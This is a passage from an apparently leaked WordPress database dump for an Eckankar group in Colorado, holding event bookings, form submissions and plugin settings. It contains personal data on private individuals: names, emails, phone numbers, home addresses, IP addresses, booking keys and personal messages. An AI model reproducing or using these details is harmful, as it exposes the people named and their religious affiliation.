08:45:44'),(174072,267585,'mec_all_dates','a:0:{}'),(174073,267585,'mec_other_dates','a:0:{}'),(174074,267585,'mec_attention_time','1673173800:1673177400'),(174075,267585,'mec_attention_time_start','1673173800'),(174076,267585,'mec_attention_time_end','1673177400'),(174077,267585,'mec_book_date_submit','20221218084544'),(174078,267585,'mec_booking_location','129'),(174079,267585,'mec_ticket_price_1','0'),(174080,267585,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"gai.lawson@icloud.com\";s:4:\"name\";s:10:\"Gai Lawson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"108.180.175.87\";}}'),(174081,267585,'mec_price','0'),(174082,267585,'mec_gateway','MEC_gateway_free'),(174083,267585,'mec_gateway_label','Free'),(174084,267586,'_field_224','Lee'),(174085,267586,'_field_225','Parimuha'),(174086,267586,'_field_226','andjustbe@gmail.com'),(174087,267586,'_field_227','CO'),(174088,267586,'_field_228','US'),(174089,267586,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(174090,267586,'_form_id','21'),(174091,267586,'_seq_num','161'),(174092,267587,'mec_transaction_id','PWO99875'),(174093,267587,'mec_user_id','1000015'),(174094,267587,'mec_verified','1'),(174095,267587,'mec_verification_key','4e5946311c3fb715f3f1f50a3c71f916'),(174096,267587,'mec_cancellation_key','c3292237dc90831118c79b5f3cbafd75'),(174097,267587,'mec_confirmed','1'),(174098,267587,'mec_event_id','266604'),(174099,267587,'mec_date','1671363900:1671368400'),(174100,267587,'mec_ticket_id',',1,'),(174101,267587,'mec_booking_time','2022-12-18 10:40:40'),(174102,267587,'mec_all_dates','a:0:{}'),(174103,267587,'mec_other_dates','a:0:{}'),(174104,267587,'mec_attention_time','1671363900:1671368400'),(174105,267587,'mec_attention_time_start','1671363900'),(174106,267587,'mec_attention_time_end','1671368400'),(174107,267587,'mec_book_date_submit','20221218104040'),(174108,267587,'mec_booking_location','118'),(174109,267587,'mec_ticket_price_1','0'),(174110,267587,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"147.219.105.219\";}}'),(174111,267587,'mec_price','0'),(174112,267587,'mec_gateway','MEC_gateway_free'),(174113,267587,'mec_gateway_label','Free'),(174114,267588,'mec_transaction_id','JSW98977'),(174115,267588,'mec_user_id','1000014'),(174116,267588,'mec_verified','1'),(174117,267588,'mec_verification_key','b6e22dad6dd687cf143ca8f5941d9b01'),(174118,267588,'mec_cancellation_key','a4778dfb3b39fdace4424709413b860b'),(174119,267588,'mec_confirmed','1'),(174120,267588,'mec_event_id','266604'),(174121,267588,'mec_date','1671363900:1671368400'),(174122,267588,'mec_ticket_id',',1,'),(174123,267588,'mec_booking_time','2022-12-18 11:55:19'),(174124,267588,'mec_all_dates','a:0:{}'),(174125,267588,'mec_other_dates','a:0:{}'),(174126,267588,'mec_attention_time','1671363900:1671368400'),(174127,267588,'mec_attention_time_start','1671363900'),(174128,267588,'mec_attention_time_end','1671368400'),(174129,267588,'mec_book_date_submit','20221218115519'),(174130,267588,'mec_booking_location','118'),(174131,267588,'mec_ticket_price_1','0'),(174132,267588,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:10:\"24.128.1.1\";}}'),(174133,267588,'mec_price','0'),(174134,267588,'mec_gateway','MEC_gateway_free'),(174135,267588,'mec_gateway_label','Free'),(174136,267589,'mec_transaction_id','HPY63199'),(174137,267589,'mec_user_id','1000061'),(174138,267589,'mec_verified','1'),(174139,267589,'mec_verification_key','abb251c36a17e83a095294720ff25ceb'),(174140,267589,'mec_cancellation_key','862d71761c55ae49d4d8b839d7607a64'),(174141,267589,'mec_confirmed','1'),(174142,267589,'mec_event_id','266604'),(174143,267589,'mec_date','1671363900:1671368400'),(174144,267589,'mec_ticket_id',',1,'),(174145,267589,'mec_booking_time','2022-12-18 11:58:08'),(174146,267589,'mec_all_dates','a:0:{}'),(174147,267589,'mec_other_dates','a:0:{}'),(174148,267589,'mec_attention_time','1671363900:1671368400'),(174149,267589,'mec_attention_time_start','1671363900'),(174150,267589,'mec_attention_time_end','1671368400'),(174151,267589,'mec_book_date_submit','20221218115808'),(174152,267589,'mec_booking_location','118'),(174153,267589,'mec_ticket_price_1','0'),(174154,267589,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:11:\"Chukwuebuka\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"67.177.210.31\";}}'),(174155,267589,'mec_price','0'),(174156,267589,'mec_gateway','MEC_gateway_free'),(174157,267589,'mec_gateway_label','Free'),(174191,267595,'_field_362','Kay'),(174192,267595,'_field_363','Patterson'),(174193,267595,'_field_370','9709867542'),(174194,267595,'_field_364','Kgbykay@gmail.com'),(174195,267595,'_field_365','Would like to meet other '),(174196,267595,'_field_366','Hello\nI live in Grand Junction and would like to meet other Eckankar members here.\n'),(174197,267595,'_form_id','39'),(174198,267595,'_seq_num','5'),(194037,269259,'mec_more_info_title',''),(194038,269259,'mec_more_info_target','_self'),(191449,269012,'_wp_attached_file','2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2.jpg'),(191450,269012,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:103:\"2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2.jpg\";s:8:\"filesize\";i:187337;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6518;}s:5:\"large\";a:5:{s:4:\"file\";s:104:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47593;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3892;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25750;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11209;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29393;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14334;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9929;}s:8:\"tileview\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17254;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:104:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120973;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191794,269103,'_field_649',''),(191795,269103,'_form_id','61'),(191796,269103,'_seq_num','9'),(194036,269259,'mec_more_info',''),(194035,269259,'mec_read_more',''),(194034,269259,'mec_organizer_id','1'),(194033,269259,'mec_dont_show_map','0'),(174215,267598,'_wp_attached_file','2022/12/sky-clouds-1.jpg'),(174216,267598,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1079;s:4:\"file\";s:24:\"2022/12/sky-clouds-1.jpg\";s:8:\"filesize\";i:231898;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"sky-clouds-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11791;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"sky-clouds-1-1024x575.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73247;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"sky-clouds-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5857;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"sky-clouds-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47701;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:24:\"sky-clouds-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16585;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:24:\"sky-clouds-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26218;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:24:\"sky-clouds-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19197;}s:8:\"tileview\";a:5:{s:4:\"file\";s:24:\"sky-clouds-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18978;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"sky-clouds-1-1536x863.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:863;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133459;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(174217,267600,'_field_30','Steve'),(174218,267600,'_field_31','Tyler'),(174219,267600,'_field_32','(310) 953-2680'),(174220,267600,'_field_33','sktyler@yahoo.com'),(174221,267600,'_field_34','2245 Whistler Dr'),(174222,267600,'_field_35','Longmont'),(174223,267600,'_field_36','CO'),(174224,267600,'_field_37','US'),(174225,267600,'_field_39','I don\'t know if your mailing list can be sent to \"yahoo.com\" addresses? Hope so!'),(174226,267600,'_form_id','4'),(174227,267600,'_seq_num','26'),(174228,267601,'mec_transaction_id','NWT38307'),(174229,267601,'mec_user_id','1000062'),(174230,267601,'mec_verified','1'),(174231,267601,'mec_verification_key','cc4b81e4392aa558b094a5ee1c9ee66c'),(174232,267601,'mec_cancellation_key','7777b91b50ccabb033c3a75075dbf654'),(174233,267601,'mec_confirmed','1'),(174234,267601,'mec_event_id','267579'),(174235,267601,'mec_date','1672569000:1672572600'),(174236,267601,'mec_ticket_id',',1,'),(174237,267601,'mec_booking_time','2023-01-01 10:35:50'),(174238,267601,'mec_all_dates','a:0:{}'),(174239,267601,'mec_other_dates','a:0:{}'),(174240,267601,'mec_attention_time','1672569000:1672572600'),(174241,267601,'mec_attention_time_start','1672569000'),(174242,267601,'mec_attention_time_end','1672572600'),(174243,267601,'mec_book_date_submit','20230101103550'),(174244,267601,'mec_booking_location','118'),(174245,267601,'mec_ticket_price_1','0'),(174246,267601,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:27:\"alexareevesmassey@gmail.com\";s:4:\"name\";s:4:\"Lexi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:10:\"24.8.68.74\";}}'),(174247,267601,'mec_price','0'),(174248,267601,'mec_gateway','MEC_gateway_free'),(174249,267601,'mec_gateway_label','Free'),(174250,267602,'_field_79','LYNNZIE'),(174251,267602,'_field_80','SUTTON'),(174252,267602,'_field_81','lynnzies3@gmail.com'),(174253,267602,'_field_82','(970) 903-5516'),(174254,267602,'_field_83','Western Slope'),(174255,267602,'_field_86','Earth Day Table/Booth - Saturday, April 23, in Centennial Park from 10 a.m. to 1 p.m.'),(174256,267602,'_field_87','Presenting an Eckankar booth outside along the Pagosa Springs Riverwalk and Centennal park.   When I saw that the Earth Day organizers were welcoming all businesses, organizations, and churches I felt this was a good event and opportunity for us.  There are very few events in Pagosa where we can have an Eckankar booth.I wish to find more events for us to present Eckankar here in Pagosa.  \n\nI would like to purchase and pay for a wheel and ask Mary Griggs where she bought the one for the Temple. This would also be used for the Durango Expo and future years for both Pagosa and Durango.  We could out give out a flyer that lists future discussions and events in Pagosa to encourage attendance.'),(174257,267602,'_field_88','To Spread the Message of ECK in Pagosa Springs by having a table with Wisdom Wheel and give out ECK Wisdom Books to the public.'),(174258,267602,'_field_89','I will apply for an application and give more details after this is approved.'),(174259,267602,'_field_90',' One to Two Eckists'),(174260,267602,'_field_91','April 22, Saturday 2023 in Centennial Park from 10 a.m. to 1 p.m.'),(174261,267602,'_field_92','Pagosa Springs river walk in downtown centennial park'),(174262,267602,'_field_93','All costs will be covered by me, I am not sure the cost if any for the table/ booth space.  I will purchase a Wisdom Wheel and will ask Mary Griggs where the Wheel was purchased for Central Colorado.'),(174263,267602,'_form_id','9'),(174264,267602,'_seq_num','2'),(174265,267603,'_field_133','Paul'),(174266,267603,'_field_134','Hanson'),(174267,267603,'_field_135','azpaulfh@aol.com'),(174268,267603,'_field_137','\"Autobiography\" book study'),(174269,267603,'_field_138','I\'d like to join the class, what chapter will be studied this month?'),(174270,267603,'_form_id','13'),(174271,267603,'_seq_num','125'),(174272,267604,'_field_30','Paul'),(174273,267604,'_field_31','Hanson'),(174274,267604,'_field_32','(480) 694-1521'),(174275,267604,'_field_33','azpaulfh@aol.com'),(174276,267604,'_field_34','57 Sky Exchange Dr  Apt 208'),(174277,267604,'_field_35','Asheville'),(174278,267604,'_field_36','NC'),(174279,267604,'_field_37','US'),(174280,267604,'_field_39',''),(174281,267604,'_form_id','4'),(174282,267604,'_seq_num','27'),(174283,267605,'_field_224','ASE Sane'),(174284,267605,'_field_225','The StarSeed'),(174285,267605,'_field_226','info@asellc.online'),(174286,267605,'_field_227','CO'),(174287,267605,'_field_228','US'),(174288,267605,'_field_229','a:2:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(174289,267605,'_form_id','21'),(174290,267605,'_seq_num','162'),(174291,267606,'_field_133','William'),(174292,267606,'_field_134','Fogle'),(174293,267606,'_field_135','fogecam1@juno.com'),(174294,267606,'_field_137','Information '),(174295,267606,'_field_138','I am the nephew of a former member Maxine Conlon. She lived in Denver from the early Seventies til her death in the late nineties. I am writing to find someone I believe to be a member of Ekankar with my aunt in the Seventies.  His name is Steven Phillips.  He plays flute and wrote a song we found while cleaning up a closet full of family items that was for my aunt.  I have tried a couple of people searches.  Facebook has been searched as well.  I am reaching out to you to see if he might still be with Ekankar?  I fully understand that you can not tell me if he is but if your records show he might be could you pass my information on to him.  To let him decide to speak with me or not.\nMaxine would have been 79.  My mother is also looking for him is 77 and would like an opportunity to speak with him about the song.  \nI thank you for the time and help.\nWilliam Fogle\nToledo Ohio\n567 377 9782 cell'),(174296,267606,'_form_id','13'),(174297,267606,'_seq_num','126'),(174311,267609,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(174312,267609,'mec_certain_weekdays','a:0:{}'),(174313,267609,'mec_allday','0'),(174314,267609,'one_occurrence','0'),(174315,267609,'mec_hide_time','0'),(174316,267609,'mec_hide_end_time','0'),(174317,267609,'mec_comment',''),(174318,267609,'mec_timezone','global'),(174319,267609,'mec_countdown_method','global'),(174320,267609,'mec_public','1'),(174321,267609,'mec_start_date','2023-01-22'),(174322,267609,'mec_start_time_hour','10'),(174323,267609,'mec_start_time_minutes','30'),(174324,267609,'mec_start_time_ampm','AM'),(174325,267609,'mec_start_day_seconds','37800'),(174326,267609,'mec_end_date','2023-01-22'),(174327,267609,'mec_end_time_hour','11'),(174328,267609,'mec_end_time_minutes','30'),(174329,267609,'mec_end_time_ampm','AM'),(174330,267609,'mec_end_day_seconds','41400'),(174331,267609,'mec_repeat_status','0'),(174332,267609,'mec_repeat_type',''),(174333,267609,'mec_repeat_interval','1'),(174334,267609,'mec_repeat_end',''),(174335,267609,'mec_repeat_end_at_occurrences',''),(174336,267609,'mec_repeat_end_at_date',''),(174337,267609,'mec_advanced_days','a:0:{}'),(174338,267609,'mec_in_days',''),(174339,267609,'mec_not_in_days',''),(174340,267609,'mec_hourly_schedules','a:0:{}'),(174341,267609,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(174342,267609,'mec_tickets','a:0:{}'),(174343,267609,'mec_fees_global_inheritance','1'),(174344,267609,'mec_fees','a:0:{}'),(174345,267609,'mec_ticket_variations_global_inheritance','1'),(174346,267609,'mec_ticket_variations','a:0:{}'),(174347,267609,'mec_reg_fields_global_inheritance','1'),(174348,267609,'mec_reg_fields','a:0:{}'),(174349,267609,'mec_bfixed_fields','a:0:{}'),(174350,267609,'mec_op','a:0:{}'),(174351,267609,'mec_fields','a:0:{}'),(174352,267609,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(174353,267609,'mec_event_status','EventScheduled'),(174354,267609,'mec_moved_online_link',''),(174355,267609,'mec_cancelled_reason',''),(174356,267609,'mec_display_cancellation_reason_in_single_page',''),(174357,267609,'protect_children',''),(174358,267609,'passster_activate_global_protection',NULL),(174359,267609,'passster_activate_protection',NULL),(174360,267609,'passster_protection_type','password'),(174361,267609,'boldgrid_hide_page_title','0'),(174362,267609,'_thumbnail_id','267212'),(174365,267609,'_dp_original','266311'),(174364,267609,'boldgrid_in_page_containers','1'),(174366,267609,'_edit_lock','1673115684:2'),(174367,267609,'_edit_last','2'),(191787,269102,'_form_id','61'),(191788,269102,'_seq_num','8'),(191789,269103,'_field_654','Laura'),(191790,269103,'_field_652','Weathley'),(191791,269103,'_field_653','lauraweathley@bresnan.net'),(191792,269103,'_field_651','(719) 221-6171'),(191793,269103,'_field_656','The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom'),(174376,267611,'mec_transaction_id','GPE25821'),(174377,267611,'mec_user_id','1000039'),(174378,267611,'mec_verified','1'),(174379,267611,'mec_verification_key','15cafc04614dd28ed3704151cf3398bd'),(174380,267611,'mec_cancellation_key','e3332c4c3233b11c8ec6f5d75de2cd4d'),(174381,267611,'mec_confirmed','1'),(174382,267611,'mec_event_id','267577'),(174383,267611,'mec_date','1673173800:1673177400'),(174384,267611,'mec_ticket_id',',1,'),(174385,267611,'mec_booking_time','2023-01-07 16:42:46'),(174386,267611,'mec_all_dates','a:0:{}'),(174387,267611,'mec_other_dates','a:0:{}'),(174388,267611,'mec_attention_time','1673173800:1673177400'),(174389,267611,'mec_attention_time_start','1673173800'),(174390,267611,'mec_attention_time_end','1673177400'),(174391,267611,'mec_book_date_submit','20230107164246'),(174392,267611,'mec_booking_location','129'),(174393,267611,'mec_ticket_price_1','0'),(174394,267611,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"n.condon@yahoo.com\";s:4:\"name\";s:5:\"Nancy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"204.144.183.245\";}}'),(174395,267611,'mec_price','0'),(174396,267611,'mec_gateway','MEC_gateway_free'),(174397,267611,'mec_gateway_label','Free'),(174398,267613,'protect_children',''),(174399,267613,'mec_color',''),(174400,267613,'mec_location_id','118'),(174401,267613,'mec_dont_show_map','0'),(174402,267613,'mec_organizer_id','1'),(174403,267613,'mec_read_more',''),(174404,267613,'mec_more_info',''),(174405,267613,'mec_more_info_title',''),(174406,267613,'mec_more_info_target','_self'),(174407,267613,'mec_cost',''),(174408,267613,'mec_currency','a:0:{}'),(174409,267613,'mec_additional_organizer_ids','a:0:{}'),(174410,267613,'mec_additional_location_ids','a:0:{}'),(174411,267613,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-01\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-01\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(174412,267613,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(174413,267613,'mec_certain_weekdays','a:0:{}'),(174414,267613,'mec_allday','0'),(174415,267613,'one_occurrence','0'),(174416,267613,'mec_hide_time','0'),(174417,267613,'mec_hide_end_time','0'),(174418,267613,'mec_comment',''),(174419,267613,'mec_timezone','global'),(174420,267613,'mec_countdown_method','global'),(174421,267613,'mec_public','1'),(174422,267613,'mec_start_date','2023-01-01'),(174423,267613,'mec_start_time_hour','7'),(174424,267613,'mec_start_time_minutes','0'),(174425,267613,'mec_start_time_ampm','PM'),(174426,267613,'mec_start_day_seconds','68400'),(174427,267613,'mec_end_date','2023-01-01'),(174428,267613,'mec_end_time_hour','8'),(174429,267613,'mec_end_time_minutes','0'),(174430,267613,'mec_end_time_ampm','PM'),(174431,267613,'mec_end_day_seconds','72000'),(174432,267613,'mec_repeat_status','0'),(174433,267613,'mec_repeat_type',''),(174434,267613,'mec_repeat_interval','1'),(174435,267613,'mec_repeat_end',''),(174436,267613,'mec_repeat_end_at_occurrences',''),(174437,267613,'mec_repeat_end_at_date',''),(174438,267613,'mec_advanced_days','a:0:{}'),(174439,267613,'mec_in_days',''),(174440,267613,'mec_not_in_days',''),(174441,267613,'mec_hourly_schedules','a:0:{}'),(174442,267613,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(174443,267613,'mec_tickets','a:0:{}'),(174444,267613,'mec_fees_global_inheritance','1'),(174445,267613,'mec_fees','a:0:{}'),(174446,267613,'mec_ticket_variations_global_inheritance','1'),(174447,267613,'mec_ticket_variations','a:0:{}'),(174448,267613,'mec_reg_fields_global_inheritance','1'),(174449,267613,'mec_reg_fields','a:0:{}'),(174450,267613,'mec_bfixed_fields','a:0:{}'),(174451,267613,'mec_op','a:0:{}'),(174452,267613,'mec_fields','a:0:{}'),(174453,267613,'mec_event_status','EventScheduled'),(174454,267613,'mec_moved_online_link',''),(174455,267613,'mec_cancelled_reason',''),(174456,267613,'mec_display_cancellation_reason_in_single_page',''),(174457,267613,'boldgrid_hide_page_title','0'),(174458,267613,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your 